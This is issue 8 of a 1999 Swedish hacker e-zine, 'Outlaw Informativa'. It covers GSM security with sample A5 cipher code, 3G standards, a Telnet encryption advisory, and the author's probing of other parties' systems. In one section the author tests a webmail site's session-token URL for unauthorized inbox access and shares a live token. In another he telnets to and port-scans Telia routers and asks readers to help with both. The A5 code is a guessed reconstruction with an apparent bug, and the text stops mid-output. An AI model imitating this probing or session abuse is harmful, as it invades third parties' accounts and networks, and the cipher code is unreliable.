OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Heretics Inc. presenterar.... [ Outlaw Informativa ] issue 8, 99-10-09 ___________________ O U T L A W 8 Oktober 9, 1999 ___________________ - A Heretics Inc. Production - "Det är den som går vilse som finner de nya vägarna" - Niels Kjear Var hälsad till nummer 8 av Outlaw Informativa. Detta nummer kommer förhoppn- ingsvis att innehålla nyttig och intressant information. Som ni kommer märkt så har Outlaw Informativa bytt från seriös stil till oseriös, jag har fått många olika åsikter kring detta fenomen. En del tycker att det är kul med lite humor där emellan vissa tycker raka motsatsen. Jag vet inte än hur jag ska lösa detta, men för att hjälpa oss kan du enkelt skicka ett email till keytrace@usa.net och säga vad du tycker. Jag har gått i funderingar på att göra Outlaw Informativa till ett mer seriöst zine vilket ödet avgör att Carding och Anarchy delarna tas bort, vad ni tycker om det kan ni genaste skicka ett mail till mig. För övrigt kommer detta nummer innehålla lite blandat information kring Telefon system, Säkerhet och även lite funderingar och enkla undersöknaringar av olika system som ofta följer med en massa frå- getecken som är meningen att ni ska maila in till keytrace@usa.net och svara på. ----------------------------------------------------------------------------- Disclaimer ----------------------------------------------------------------------------- Andvänder du materialet i detta elektroniska tidning i olagligt syfte och åker fast för det så får du stå för det. Du tar själv ansvar för dina egna handlingar. ----------------------------------------------------------------------------- Medverkande ----------------------------------------------------------------------------- En enkel lista med folk som skrivit för detta nummer och hur du kan komma i kontakt med personen. Alias: diox1de Contact: keytrace@usa.net ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Alias: ncode Contact: root@sectech.org ¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Alias: p01nt_zer0 Contact: po1nt_zero@hotmail.com ¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ----------------------------------------------------------------------------- I N N E H Å L L S F Ö T E C K N I N G $ Staff 1:1. Editor 1:2. Disclaimer 1:3. Medverkande 1:4. Innehållsförteckning 1:5. Aktuellt 1.6. Heretics Manifesto $ Nyheter 2.1. Microsoft kritiserar Linux 2.2. Sun släpper källkoden för Solaris fri $ Phreaking och Telefoni 3:1. Säkerhet i GSM systemet, del #3 av: diox1de 3:2. IMT-2000/FPLMTS av: p01nt_zer0 3:3. UMTS av: p01nt_zer0 $ Hacking, Säkerhet, Unix etc. 4:1. Paket kryptering i Telnet av: diox1de 4:2. Möjlig bakdörr i marijuana.com av: diox1de 4:3. Funderingar kring Telia av: diox1de 4:4. Skapa ett SUID Shell av: ncode 4:5. Enkelt om 2 olika Trojaner av: diox1de 4:6. Brev angående telias rätt om språrning av: anonymous 4:7. Linux för dumma, del #1 av: diox1de $ Insändare 5:1. Netscape 4.05 (Messenger) kryptering $ Några ord innan slutet 6:1 . Copyright 6:2 . return 0; När du befinner dig på öppet territorium, stör ingen. Om någon stör dig, be honom sluta. Slutar han inte, gör slut på honom. ----------------------------------------------------------------------------- Aktuellt ----------------------------------------------------------------------------- ¤ Heretics hemsida flyttad Heretics Inc. 's hemsida flyttades från kontot till www.g1mp.net/heretics, och det har jag ncode att tacka för, tack ¤ Prenumerations listan läggs ner ! Prenumerations listan läggs ner, eftersom alla prenumerationer försvann i en hårdisk krash, och när jag checkade min mail dit alla prenumerationer skickas så låg där 200 stycken, jag har inte andvändt mig av något program som hanterar prenumerationen. ¤ p01nt_zer0 skriver lite texter, kommer eventuellt joina p01nt_zer0 har mycket kunskap kring Phreaking/Telefoni och han kommer möjlig- tvis joina Heretics, än så länge verkar det som han lyckats, eftersom inform- ationen som kommer bla. i detta nummer inte finns i något annat zine..alltså inte så välskrivet om :) ¤ Kunskapsplan resulterar i texter och artiklar Jag diox1de har lagt upp något som jag kallar för en kunskapslan. Jag har lagt upp typ ett schema vad jag ska läsa och praktisera om, nu håller jag på att studera Unix nästa kommer bli Windows NT, sen C programmering osv. Detta kommer resultera att jag skriver textfiler/artiklar, men dessa kommer bara vara skrivna för min egen skull, för att jag ska lära mig bättre. ¤ Kommande Projekt En tutorial om Kryptering Kryptering är ett hett ämne just nu, pågrund av att mycket har börjat skötas via Internet, typ internet handel och dyl. Detta är så pass nytt så säkerheten ligger bakom frågetecknet. Därför hade jag tänkt att skriva en tutorial om Kryptering som programmerare, systemansvariga och säkerhets intresserade kommer ha nytta av.Jag kommer skriva om hur kryptering fungerar vid kommunikation över känsliga kanalen, hur assymetriska och symmetriska chiffer fungerar,lite enkelt om historia och angrepp mot de olika teknikerna vid kryptering. För att texten jag har börjat på ska hålla hög klass och nnehålla rätt information så behöver jag åsikter, tips osv. om texten, visserligen har jag inte kommit speciellt långt på den, ligger på ca. 30k just nu. Men du som vet att du är hyffsat seriös och kan en del kring kryptering och har möjlig- heter att hjälpa till så maila diox1de@hacksweden.com. Praktik och Teori svävande kring PPP och Modem Detta är ett eventuellt projekt som jag kanske ska börja med. Jag har läst Rasslade lite i mitt text arkiv och hittade ett par textfiler om PPP protok- ollet och om Modem kommunikation,j ag läste igenom information och blev dir- ekt intresserad. Så nu håller jag på med en tutorial som jag kommer kalla: Praktik och Teori svävande kring PPP och Modem. Den kommer innehålla information hur Modem fungerar, hur du kodar fjärranslutnings script, Teoretisk förklaring av PPP protokollet samt hur du sätter upp en PPP anslutning i Linux. Om du vill hjälpa till och ge tips, förslag eller skicka information svävande kring ämnet jag kommer skriva om så står min mail addr- ess nedan. - diox1de@hacksweden.com NTFS whitepaper Detta är ett eventuellt projekt som jag kanske ska börja med. Jag har läst lite smått om NTFS (Network File System) och blivit mycket intresserad. Om du vill att det ska bli nåt så skicka så mycket information om NTFS du kan till diox1de@hacksweden.com. Först och främst ska jag ägna mig åt texten om kryptering och Outlaw Informativa. Men när texten om kryptering börjar ta sig i form och bli klar så kommer jag antagligen börja ordenkligt med texten om NTFS. Det är bara en tidfråga tills det ligger NTFS whitepaper ligger på Heretics projekt arkiv. ----------------------------------------------------------------------------- Heretics Manifesto ----------------------------------------------------------------------------- Vi förstår att du vill lära dig, men för att lära dig behöver du styrka som kommer följa dig tills du når dina mål. Styrkan kommer hjälpa dig att förstå, att hantera fel. Under tiden du lär dig måste du hela tiden hålla tanken i bakhuvudet; överskatta dig inte själv, var självsäker men dölj det för andra. Om det är någon som ber om hjälp, bli då uppmärksamm och försök att hjälpa personen så mycket du kan. Akta dig noga för den mörka sidan byggt på elitis- m, känner du stor ondska över en person försök hålla kommentarerna till dig själv och bevara dom där eller argumentera på ett bra sätt med personen. The Dark Side is closer than you think. ----------------------------------------------------------------------------- Microsoft kritiserar Linux ----------------------------------------------------------------------------- Som ni kanske vet så är det många som byter från Microsofts operativsystem till Linux, det har även själv gjort. Detta leder ju också till att MS förlorar en jävla massa pengar. Microsoft är/har blivit oroliga och osäkra. På en websida, närmare bestämt: http://www.microsoft.com/ntserver/nts/news/msnw/LinuxMyths.asp MS påstår att att Linux är ett ostabilt osäkert system jämnfört med WinNT. Jag har själv studerat en del hål i Linux och i NT och gämnfört dem, resulta- tet är ju då att Windows NT är så grymt mycket ostabilare än vad Linux är. MS tar till alla medel för att skrämma Linux andvändarna och sno tillbaka sina kunder. Seriöst så tror jag att dom inte har lyckats något vidare. Källa: http://linux.idg.se ----------------------------------------------------------------------------- Sun släpper källkoden för Solaris fri ----------------------------------------------------------------------------- Sun Microsystems släpper källkoden för sitt os Solaris helt fri. Villkoret är dock att programmerarna inte får utveckla sina egna lösningar. Dom släppte den fri för att bla. administratörer ska kunna bygga ett kluster eller sätta upp en webbserver, då väljer dom istället Linux framför Solaris. Det kommer även bli stor konkuranns när Microsoft släpper sitt nya os Windows 2000. ----------------------------------------------------------------------------- Säkerhet i GSM systemet, del #3 ----------------------------------------------------------------------------- [Förord] Ännu en del om GSM Säkerhet, ligger nu uppe i #3 delen och kommer bli den sista, men jag kommer dock förlänga den här artikeln lite. Den kommer alltså bli en aning större en de andra delarna. [Översikt] För er som inte läst alla #3 serierna om GSM Säkerhet så tänkte jag gå igenom vad alla handlar om. .---------------------------------------------------------------------------. |DEL #1: Handlar om hur Subscriber Identity Authentication fungerar och | | lite annat smått och gott som dyker upp där emellan. | | | |DEL #2: Handlar om Krypterings-algoritmen A5, hur den fungerar teoretiskt | | sätt. | | | |DEL #3: Handlar om hur "User and Signalling Data Confidentiality" fungerar | | och lite om A5 igen som andvänds i det ovan + Subscriber Identity | | Confidentiality . | `---------------------------------------------------------------------------´ [User and Signalling Data Confidentiality] User and Signalling Data Confidentiality har tre element att ta hand om och dessa är: ¤ user data confidentiality ¤ signalling information on physical connections ¤ connectionless user data confidentiality and signalling information element confidentiality. --> "user data confidentiality" Tar hand om privacy för andvändaren som genererat all data, både röster och data som kommer från mobilen. Alltså som skickas över radio och trafik kanalerna. --> "signalling information" som seglar runt på fysiska anslutningar Signal Informationen (Signalling Information) har också med privacy att göra. Tar hand om andvändar information som skickas i form av ett paket av information som går via radio länken på signal kanalen. Detta transporteras hit och dit på de fysiska anslutningarna (physical connecti- ons) --> "connectionless user data confidentiality" och "signalling information element confidentiality". Det tredje elementet förser för enskildheter av en "certain user" som är besläktad med andra signal element som går via radio länken på signal kanalen. För att det ska bli säkert i överföring av alla de tre elmenten så behövs självklart kryptering, här andvänds A5 som är beskriven i del #2. För att det ska funka att andvända A5 algoritm så måste alla nätverk och mobiler ha stöd för det, annars blir det en hel del problem. Jag tänke beskriva algoritm A5 lite enkelt för att uppdaterera era kunskaper, men främst mina. A5 är en algortim för att kryptera trafik. Först skapar den en keystream under kontroll av en en nyckel. Bit för Bit av keystreamen transporteras över Radio Länken mellan Basstationen och MS:en. Nyckeln blir etablerad på MS:en som en liten del av authenication proceduren. Informationen blir dekrypterad efter MS:en har blivit identifierad. Mer orkar jag inte berätta pågrund av bakfylla, trötthet osv. Men A5 är ju förklarad i #7:an så ni kan ju läsa där också. Note: MS = Mobile Subscriber, mobiltelefon med andra ord. [Subscriber Identity Confidentiality] Är en slags funktion eller applikation som gör det möjligt för en andvändare att uppdatera sin "location etc." utan att avslöja sitt "International Mobile Subscriber Identity (IMSI) för någon som gör ett försök till ett angrepp på radio länken. Med andra ord hindrar den alltså att någon sniffar signal växlingen på radio länken för att söka upp en bestämd mobitelefonens befintl- iga "location". Alla mobil nät och mobiltelefoner måste i regel kunna stödja denna tjänst, det är iofs inte helt obligatoriskt. Det är absolut nödvändigt att IMSI inte skickas i cleartext på Radio länken, visserligen finns det fall där det inte gör det och då dyker många effektiva angrepp upp som kan göra att en person kan s niffa Radio länken. Mekanism i mobilen ska vara försedd med denna funktion och den ska även vara baserad på temporary mobile subscriber identity (TMSI) som oskyldigt men mycket säkert uppdateras efter varje lyckad tillgång (Successful Access :P) till systemet. I princip så behöver inte TMSI vara krypterad när den överförs på Radio Länk- en. Som nämnt tidigare så behöver däremot IMSI vara krypterad eftersom effektiva angrepp kan uppstå. Hur fungerar det då?...Jo, detta förutsätter att MS är tilldelat med en TMSI, betecknas betäcknas som TMSIo, och att nätverket har etablerat en förening mellan TMSIo och en sk. "Mobile Subscriber" alltså typ en abbonent eller helt enkelt en mobiltelefon. MS identifierar sig med Nätverket (authenticerar). Direkt efter authenticationen är genomförd (om den nu blir det :-/) Nätverket generar ett nytt TMSI, betäcknas då som TMSIn, och skickar sedan det till MS och skickas då i krypterad form (Krypterat med nyckeln Kc) MS dekrypterar och ersätter TMSIo med TMSIn. [Ett exempel på A5] Här kommer källkoden för ett exempel av A5 algoritmen. Du kan försöka hitta på något kul med den eller nåt. /* * In writing this program, I've had to guess a few pices of information: * * 1. Which bits of the key are loaded into which bits of the shift register * 2. Which order the frame sequence number is shifted into the SR (MSB * first or LSB first) * 3. The position of the feedback taps on R2 and R3 (R1 is known). * 4. The position of the clock control taps. These are on the * `middle' one, * I've assumed to be 9 on R1, 11 on R2, 11 on R3. */ /* * Look at the `middle' stage of each of the 3 shift registers. * Either 0, 1, 2 or 3 of these 3 taps will be set high. * If 0 or 1 or one of them are high, return true. This will cause each of * the middle taps to be inverted before being used as a clock control. In * all cases either 2 or 3 of the clock enable lines will be active. Thus, * at least two shift registers change on every clock-tick and the system * never becomes stuck. */ static int threshold(r1, r2, r3) unsigned int r1; unsigned int r2; unsigned int r3; { int total; total = (((r1 >> 9) & 0x1) == 1) + (((r2 >> 11) & 0x1) == 1) + (((r3 >> 11) & 0x1) == 1); if (total > 1) return (0); else return (1); } unsigned long clock_r1(ctl, r1) int ctl; unsigned long r1; { unsigned long feedback; /* * Primitive polynomial x**19 + x**5 + x**2 + x + 1 */ ctl ^= ((r1 >> 9) & 0x1); if (ctl) { feedback = (r1 >> 18) ^ (r1 >> 17) ^ (r1 >> 16) ^ (r1 >> 13); r1 = (r1 << 1) & 0x7ffff; if (feedback & 0x01) r1 ^= 0x01; } return (r1); } unsigned long clock_r2(ctl, r2) int ctl; unsigned long r2; { unsigned long feedback; /* * Primitive polynomial x**22 + x**9 + x**5 + x + 1 */ ctl ^= ((r2 >> 11) & 0x1); if (ctl) { feedback = (r2 >> 21) ^ (r2 >> 20) ^ (r2 >> 16) ^ (r2 >> 12); r2 = (r2 << 1) & 0x3fffff; if (feedback & 0x01) r2 ^= 0x01; } return (r2); } unsigned long clock_r3(ctl, r3) int ctl; unsigned long r3; { unsigned long feedback; /* * Primitive polynomial x**23 + x**5 + x**4 + x + 1 */ ctl ^= ((r3 >> 11) & 0x1); if (ctl) { feedback = (r3 >> 22) ^ (r3 >> 21) ^ (r3 >> 18) ^ (r3 >> 17); r3 = (r3 << 1) & 0x7fffff; if (feedback & 0x01) r3 ^= 0x01; } return (r3); } int keystream(key, frame, alice, bob) unsigned char *key; /* 64 bit session key */ unsigned long frame; /* 22 bit frame sequence number */ unsigned char *alice; /* 114 bit Alice to Bob key stream */ unsigned char *bob; /* 114 bit Bob to Alice key stream */ { unsigned long r1; /* 19 bit shift register */ unsigned long r2; /* 22 bit shift register */ unsigned long r3; /* 23 bit shift register */ int i; /* counter for loops */ int clock_ctl; /* xored with clock enable on each shift register */ unsigned char *ptr; /* current position in keystream */ unsigned char byte; /* byte of keystream being assembled */ unsigned int bits; /* number of bits of keystream in byte */ unsigned int bit; /* bit output from keystream generator */ /* Initialise shift registers from session key */ r1 = (key[0] | (key[1] << 8) | (key[2] << 16) ) & 0x7ffff; r2 = ((key[2] >> 3) | (key[3] << 5) | (key[4] << 13) | (key[5] << 21)) & 0x3fffff; r3 = ((key[5] >> 1) | (key[6] << 7) | (key[7] << 15) ) & 0x7fffff; /* Merge frame sequence number into shift register state, by xor'ing it * into the feedback path */ for (i=0;i<22;i++) { clock_ctl = threshold(r1, r2, r2); r1 = clock_r1(clock_ctl, r1); r2 = clock_r2(clock_ctl, r2); r3 = clock_r3(clock_ctl, r3); if (frame & 1) { r1 ^= 1; r2 ^= 1; r3 ^= 1; } frame = frame >> 1; } /* Run shift registers for 100 clock ticks to allow frame number to * be diffused into all the bits of the shift registers */ for (i=0;i<100;i++) { clock_ctl = threshold(r1, r2, r2); r1 = clock_r1(clock_ctl, r1); r2 = clock_r2(clock_ctl, r2); r3 = clock_r3(clock_ctl, r3); } /* Produce 114 bits of Alice->Bob key stream */ ptr = alice; bits = 0; byte = 0; for (i=0;i<114;i++) { clock_ctl = threshold(r1, r2, r2); r1 = clock_r1(clock_ctl, r1); r2 = clock_r2(clock_ctl, r2); r3 = clock_r3(clock_ctl, r3); bit = ((r1 >> 18) ^ (r2 >> 21) ^ (r3 >> 22)) & 0x01; byte = (byte << 1) | bit; bits++; if (bits == 8) { *ptr = byte; ptr++; bits = 0; byte = 0; } } if (bits) *ptr = byte; /* Run shift registers for another 100 bits to hide relationship between * Alice->Bob key stream and Bob->Alice key stream. */ for (i=0;i<100;i++) { clock_ctl = threshold(r1, r2, r2); r1 = clock_r1(clock_ctl, r1); r2 = clock_r2(clock_ctl, r2); r3 = clock_r3(clock_ctl, r3); } /* Produce 114 bits of Bob->Alice key stream */ ptr = bob; bits = 0; byte = 0; for (i=0;i<114;i++) { clock_ctl = threshold(r1, r2, r2); r1 = clock_r1(clock_ctl, r1); r2 = clock_r2(clock_ctl, r2); r3 = clock_r3(clock_ctl, r3); bit = ((r1 >> 18) ^ (r2 >> 21) ^ (r3 >> 22)) & 0x01; byte = (byte << 1) | bit; bits++; if (bits == 8) { *ptr = byte; ptr++; bits = 0; byte = 0; } } if (bits) *ptr = byte; return (0); } [Förkortningar, sammanfattning] LSFR : Linear Feedback Shift Register MS : Mobile Subscriber dvs. Mobil Telefon TMSI : temporary mobile subscriber identity IMSI : International Mobile Subscriber Identity AUC : Authentication Center HLR : Home Location Register VLR : Visitor Location Register hehe, som sagt: Ingen publicerings kvalitet. [Källförteckning] Eftersom det här va sista delen så tänke jag skriva källförtecking, alltså var jag fått tag i all info. Overview of GSM Security Features (LoU) Att förstå Telekommunikaion (Telia & Ericsson) Usenet (sci.crypt) [Efterord] Nu va det slut på serien "Säkerhet i GSM systemet", om du skulle läsa även dokumentationen som är tecknad i avdelningen "Källförteckning" kan du lätt uppleva som att jag återberättar och översätter informationen. Det är delvis sant, att jag skrev denna serie med artiklar va för min egen skull eftersom jag har studerat GSM Säkerhet ett tag, dock ingen direkt fördjupning i ämnet. Om ni tyckte att serierna var nyttiga och bra så är det ju bara ett bonus. Jag vet att de inte höll någon publicerings kvalitet. Men jag släppte dem endå. Förövrigt har jag dragit slutsatsen om att GSM Nätet håller förhålland- evis mycket hög Säkerhet som inte direkt vem som helst skulle kunna göra ett effektivt angrepp mot. Glöm inte bort att artiklarna är baserade på en studie i GSM Säkerhet. ----------------------------------------------------------------------------- IMT-2000/FPLMTS ----------------------------------------------------------------------------- FPLMTS - Future Public Land Mobile Telecommunication System har bytt namn till IMT-2000 - International Mobile Telecommunication 2000. Förutom FPLMTS ingår även GMPCS - Global Mobile Personal Communications. Utvecklingen av IMT-2000 drivs av ITU-R och målet är kommunikation när och var som helst. Det är viktigt att det ska kunna utnyttjas med hjälp av en liten kommunikationsenhet man lätt kan bära med sig, t.ex. en mobiltelefon. IMT-2000 omfattar flera olika radiomiljöer, som börjar med små miljöer inomhus, där man skall erbjuda hög kapacitet, detta fortsätter vidare via lokala och regionala miljöer till en global miljö där man med hjälp av satelliter täcker in hela jorden. Man kommer alltså att använda olika tekniker inom områden, samtidigt som dessa tekniker ska kunna samverka och bilda en enhet, jämför med GSM/DECT där det finns telefoner som kan arbeta inom båda miljöerna. De frekvenser som ska användas har angivits till 1.885-2.225 och 1.980- 2.200 MHz, varav 1.980-2.010 och 2.170-2.200 skall användas för satelitkommu- nikation. Frekvenserna har angivits av WARC - World Administrative Radio Conferance. IMT-2000/FPLMTS och UMTS är tredje generationens mobiltelefonisystem, andra generationens GSM, D-AMPS och PDC är det vi använder idag och första generationen, som fortfarande är i bruk NMT, AMPS och TACS. Ett av de viktig- aste målen för IMT-2000 är att utforma en global standard, så att samma system kan användas över hela världen. Följande standarder har utformats av ITU-R för att beskriva IMT-2000: Standard: Innehåll: M.816 Framework for services supported by FPLMTS. M.817 Network architectures for FPLMTS. M.818 Satellite operation whitin FPLMTS. M.819 Adaption of FPLMTS to the needs of developing countries. M.1034 Requirements for the radio interface(s) for FPLMTS. M.1035 Framework for the radio interface(s) and radio subsystem functionality for FPLMTS. M.1036 Spectrum consideations for implementation of FPLMTS in the bands 1885-2025 MHz and 2110 MHz. M.1078 Security principles for FPLMTS. M.1079 Spech and voiceband data performance requirements for FPLMTS. (Tabellen är inte översatt pågrund av att det är lättare att förstå vad som menas om det är på engelska om det skulle dyka upp i andra texter när du studerar) IMT-2000/FPLMTS kommer att erbjuda ett brett utbud av tjänster, baserat på de tjänster såväl fasta som mobila telenät kan erbjuda. Tjänsterna omfattar personsökning, digitala datatjänster och audio/video. Tjänster som kräver hög bandbredd/kapacitet kommer i första hand att erbjudas i tätbefolkade områden. Oavsett var i världen man befinner sig, kommer man minst att ha tillgång till ett grundutbud av tjänster. Knowledge is a treashre but... practice is the main key to to it. ----------------------------------------------------------------------------- UMTS ----------------------------------------------------------------------------- UMTS är ett europiskt initiativ som drivs av ETSI, för att skapa en gemensam internationell standard för alla former av mobiltelekommunication, inklusive mobiltelefoni. UMTS är en europisk variant an IMT-2000 - International Mobile Tele- communication 2000 som drivs av ITU. (jag gått igenom det i en tidigare text) De generella målen för UMTS är: Kapacitet: Att kunna erbjuda upp till 2 Mbps kapacitet för olika tjänster, med reservation för de fysiska förutsättningarna som den aktuella förbindelsen erbjuder. Kvalitet: Erbjuda en kvalitet på kommunikation som lägst uppfyller de krav som gäller för fasta förbindelser. Funktioner, tjänster: Kunna tillhandahålla ett brett spektra av tjänster anpassade för olika användare. Stöda UPT (Universal Personal Telecommunications). Att stöda "wideband" intergration med B-ISDN via ATM. Det ska vara dynamiskt så att det är lätt att lägga till nya tjänster och funktioner. Det ska kunna allokera bandbredd dynamiskt och vid behov (on demand). Kompatibilitet, standarder: Det ska stämma överäns med ITUs IMT-2000 rekommendationer. Det ska kunna anpassas för alla tjänster och all utrustning som i fram- tiden kommer att kunna användas i fasta nät. Det ska finnas stöd för både öppna och slutna standarder. Kompatibilitet för intelligenta tjänster i både fasta och mobila nätverk. Kunna förena de många mobiltelefonisystem som finns idag, samtidigt som valfrihet ska kunna erbjudas. Det ska kunna fungera internationellt (iaf i Europa), inom olika typer av miljöer och terräng. Det ska kunna stöda avreglering och konlurrens inom alla typer av miljöer och applikationer. Dela resurserna i radiobandet mellan olika operatörer, både publika och privata. Dela resurserna i radiobandet mellan ett standardiserat grundutbud av tjänster och ett mer dynmiskt utbud som baseras på marknadens behov. Det är alltså ganska många krav som skall uppfyllas, men vissa av dem är redan lösta, t.ex. med hjälp av GSM. Nätverk och radiolänk UMTS utformas för att använda Intelligenta Nätverk (IN) och erbjuda de tjänster som då blir möjliga, de komponenter som kommer att ingå är t.ex. SCPer. Detta gör att man lätt kan åstakomma användaranpassade tjänster och att man kan ändra tjänsterna i grundutbudet. UMTS ska ingå i IBCN - Intergrated Broadband Communications Network som en enhet för mobil access mot B-ISDN. Detta innebär att mobila nät kommer att kunna erbjuda tjänster som tidigare endast fasta nät kunnat erbjuda. Knowledge is a treashre but... practice is the main key to to it. ----------------------------------------------------------------------------- Paket kryptering i Telnet ----------------------------------------------------------------------------- Jag tänkte ta upp ett hål i Berkelys Telnet klienter som stödjer "Telnet enc- ryption Option" som andvänder Kerberos V4 authentication. [ok, till själva problemet] Vem som helst kan få tillgång till de krypterade paketen och enkelt dekrypte- ra. Man kan enkelt sniffa paketen för att få tag i dem. [Lösning] Den vanliga lösningen är att ladda ner uppgraderingar, som jag listar nedan.. Source code för en patch: net-dist.mit.edu:/pub/telnet/telnet.patch Uppgraderingar: ftp.ncsa.uiuc.edu/Mac/Telnet/Telnet2.6/prerelease/d7/Telnet2.6.1d7(68K).sit.hqx /Mac/Telnet/Telnet2.6/prerelease/d7/Telnet2.6.1d7(fat).sit.hqx Plugins för Kerberos: ftp.ncsa.uiuc.edu/Mac/Telnet/Telnet2.6/prerelease/AuthMan.plugin.1.0b1.hqx /Mac/Telnet/Telnet2.6/prerelease/Kerberos_Telnet_plugin.sit.hqx Källa: CERT ----------------------------------------------------------------------------- Möjlig bakdörr i marijuana.com ----------------------------------------------------------------------------- Jag är lite osäker på detta men jag förklarar det jag upptäckte så skickar ni information som jag inte vet till mig på keytrace@usa.net http://mail.marijuana.com/mail/check_mail/user/c8116dca1e48dd76379f7582197293fa c8116dca1e48dd76379f7582197293fa Summan är samma varje gång någon loggar in varje andvändare har sin egen summa vilket tyder på att det är ett krypter- at lösenord. Om jag nu loggar in på min egna inbox på marijuana.com och kopierar url:en till inboxen så kan denna person läsa alla min brev jag fått plus kolla på filer som folk skickat till mig. Det jag testade var att ge url:en till en polare på IRC och bad honom kolla om han fick någon access till dem. http://mail.marijuana.com/mail/check_mail/user/c8116dca1e48dd76379f7582197293fa Är url:en till inboxen. http://mail.marijuana.com/mail/attachment/user/c8116dca1e48dd76379f7582197293fa/pic.jpg?msg=6&part=8 Är url:en till en fil. Detta funkade när jag va inloggad trycker jag på logout button i deras script baserade webmail så har ingen access till url:en längre. Men om jag istället skiter i att trycka på logout, så har alla access till min inbox, detta bygger iofs på att den som vill rota i någons privata liv måste ha tillgång till url:en. Det jag inte vet och det jag vill veta från er är om denna summa eller teckensamling: c8116dca1e48dd76379f7582197293fa Är det ett krypterat lösenord eller en checksum eller liknande för deras cgi/perl script. Om det är ett krypterat lösenord i sånna fall, vilken algoritm andvänder dom ? .. Hur tar jag reda på det ? Jag skickade ett email och frågade lite diskret hur hög säkerhet jag har och vad för algortim dom andvänder, dom svarade: We never give out our encryption methods, but I can assure you that we are among the safest in the industry. wm m.com On 12 Sep 1999, anon wrote: > Date: 12 Sep 1999 05:35:36 -0700 > From: anon <xxxx> > To: xxxx@marijuana.com > Subject: how high is my security ? > > Hi! > I´m sending you this e-mail because i want to know how high security i have because > i dont want anything bad to happen to me or my e-mail. So i wounder > what algorithm you use to encrypt my e-mails and if you are using a commercial, > in that case, wich one? and if you are using your own, how safe is it for me to use? > > thanks. > > // X Så på något sätt måste jag få reda på vad dessa siffror och bokstäver i url:en till inboxen är, det är det jag behöver veta för att gå vidare. ----------------------------------------------------------------------------- Funderingar kring Telia ----------------------------------------------------------------------------- Detta är också lite frågor som jag vill få reda på i denna artikel, som ni självklart måste svara på om ni kan dom :) Jag testade att göra en traceroute på mig själv av ren tråkighet och en av de maskinerna som paketen som kommer från min dator som paserar maskinen va: ny-b1-pos5-0-0.telia.net (209.95.159.22) Jag testade att telnetta til maskinen [209.95.159.22] och fick då en login prompt, som såg ut så här: ------------------------- User Access Verification Username: ------------------------- En sak jag klurar över är om hosten [ny-b1-pos5-0-0.telia.net] har några synonymer som betyder någon som kan ge mig information vad maskinen andvänds till, om det är en router/firewall/proxy eller liknande. De portar på maskinen som va öppnade: 79 Finger 23 Telnet De som var filtrerade, alltså de som är bevakade av än Firewall är: 137 netbios-ns (vad står ns för?, namserver ?) 138 netbios-dgm (vad står dgm för ?) 139 netbios-ssn (Vad står ssn för ?, SecureSecuredNetwork =) ?) Detta tyder på att dom andvänder NT, alla LAMA företag andvänder NT, det är *NIX som gäller. Men kan också andväna Unix men också både och, det är det som jag också vill få reda på. Jag testade att logga in på ett telia konto på servern, det gav: Jag testade att telnetta till finger porten (79) och fick då fram mitt eget hostname, vilket tyder på att det är någon slags packet filter eller nåt. Line User Host(s) Idle Location * 2 vty 0 idle 00:00:00 xxxxxxxxx.telia.com vty, ska stå för nåt med Virtual Terminal iafs. idle står för hur länge sedan usern knappade på controllern, dvs tangentbo- rdet. Detta ser ut att vara någon slags PPP station och antagligen när man kommuni- cerar mellan hemnumret till Telia så går informationen mellan olika datorer i Telias nätverk som hanterar uppkopplingsförbindelserna osv. Testa att telnetta till 209.95.159.21, vilket ger samma Login prompt som 209.95.159.22. Som tyder på att det är en rad datorer eller maskiner (typ packet filter osv.) som styr uppkopplingen och kommunikation från min dator genom telias nätverk till nästa dator, typ: ____ _ _ .------. _ _ ____ | |=========>|*|-->|*|--->|------|-->|*|-->|*|===>| | |PC1 | | | |NT ¤| | | |xxx | |____|<=========|*|<--|*|<---|Serv ¤|<--|*|<--|*|<===|____| ¯ ¯ '------' ¯ ¯ PC1: En persondator _ |*|: Små applikationer som hör till telias nätverk, typ ppp stationer som ¯ hanterar uppkopplingar och förbindelser. En sak som är säker är att Telia har ett antal ATM växlar som IP:et går igenom. NT : Telias Windows NT server. Serv xxx: Datorn som innehåller filer för transmissionen, t.ex. FTP servern som du ska hämta ner Slackware 4.0 ifrån eller helt enkelt t.ex. Aftonblade- ts hemsida, välj själv. Ok, nu testar vi en annan dator... 209.95.159.5 [sf-i2.telia.net] Jag testar att telnetta, vilket ger en login prompt..precis som när jag telnettade till 209.95.159.22 och 209.95.159.21. Jag testade sedan att telnetta till Chargen(19) vilket genererade en massa tecken som aldrig tog stopp, i den här stilen: ------------------------------------------------------------------------ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh "#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi #$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij $%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk %&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl &'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm '()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn ()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno )*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop *+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq +,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr 